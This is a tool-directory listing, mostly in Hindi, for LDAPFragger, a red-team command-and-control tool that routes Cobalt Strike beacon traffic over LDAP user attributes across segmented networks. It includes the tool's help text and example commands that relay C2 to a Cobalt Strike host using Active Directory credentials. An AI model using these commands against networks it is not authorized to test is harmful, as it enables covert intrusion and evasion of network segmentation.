Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
LDAPFragger — सी2 उपकरण जो विभाजित नेटवर्कों में गुप्त कमांड-एंड-कंट्रोल के लिए LDAP उपयोगकर्ता विशेषताओं पर Cobalt Strike बीकन डेटा रूट करता है। | Kitploit
उपकरण/GitHubGitHub/fox-it/ldapfragger
भेद्यता परीक्षण फ्रेमवर्कशोषण फ्रेमवर्ककमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
GitHubfox-it/ldapfragger

LDAPFragger

सी2 उपकरण जो विभाजित नेटवर्कों में गुप्त कमांड-एंड-कंट्रोल के लिए LDAP उपयोगकर्ता विशेषताओं पर Cobalt Strike बीकन डेटा रूट करता है।

रिपॉजिटरी देखें
196286 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

LDAPFragger

LDAPFragger एक कमांड और नियंत्रण उपकरण है जो हमलावरों को उपयोगकर्ता विशेषताओं का उपयोग करके LDAP पर Cobalt Strike बीकन डेटा को रूट करने में सक्षम बनाता है।

पृष्ठभूमि जानकारी के लिए, रिलीज़ ब्लॉग पढ़ें: http://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes

निर्भरताएँ और स्थापना

  • .NET 4.0 के साथ संकलित, लेकिन पुराने और नए .NET फ्रेमवर्क के साथ भी काम कर सकता है

उपयोग

root@kitploit:~
 _     _              __
| |   | |            / _|
| | __| | __ _ _ __ | |_ _ __ __ _  __ _  __ _  ___ _ __
| |/ _` |/ _` | '_ \|  _| '__/ _` |/ _` |/ _` |/ _ \ '__|
| | (_| | (_| | |_) | | | | | (_| | (_| | (_| |  __/ |
|_|\__,_|\__,_| .__/|_| |_|  \__,_|\__, |\__, |\___|_|
              | |                   __/ | __/ |
              |_|                  |___/ |___/

Fox-IT - Rindert Kramer

Usage:
     --cshost:  IP address or hostname of the Cobalt Strike instance
     --csport:  Port of the external C2 interface on the Cobalt Strike server
     -u:        Username to connect to Active Directory
     -p:        Password to connect to Active Directory
     -d:        FQDN of the Active Directory domain
     --ldaps:   Use LDAPS instead of LDAP
     -v:        Verbose output
     -h:        Display  this message

If no AD credentials are provided, integrated AD authentication will be used.

उदाहरण उपयोग:

नेटवर्क खंड A से, चलाएँ

root@kitploit:~
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port>

LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port> -u <username> -p <password> -d <domain FQDN>

नेटवर्क खंड B से, चलाएँ

root@kitploit:~
LDAPFragger 

LDAPFragger -u <username> -p <password> -d <domain FQDN>

LDAPS का उपयोग --LDAPS फ्लैग के साथ किया जा सकता है, हालांकि नियमित LDAP ट्रैफ़िक भी एन्क्रिप्टेड है। कृपया ध्यान दें कि डिफ़ॉल्ट Cobalt Strike पेलोड अधिकांश AV द्वारा पकड़ा जाएगा।

टूल डाउनलोड करें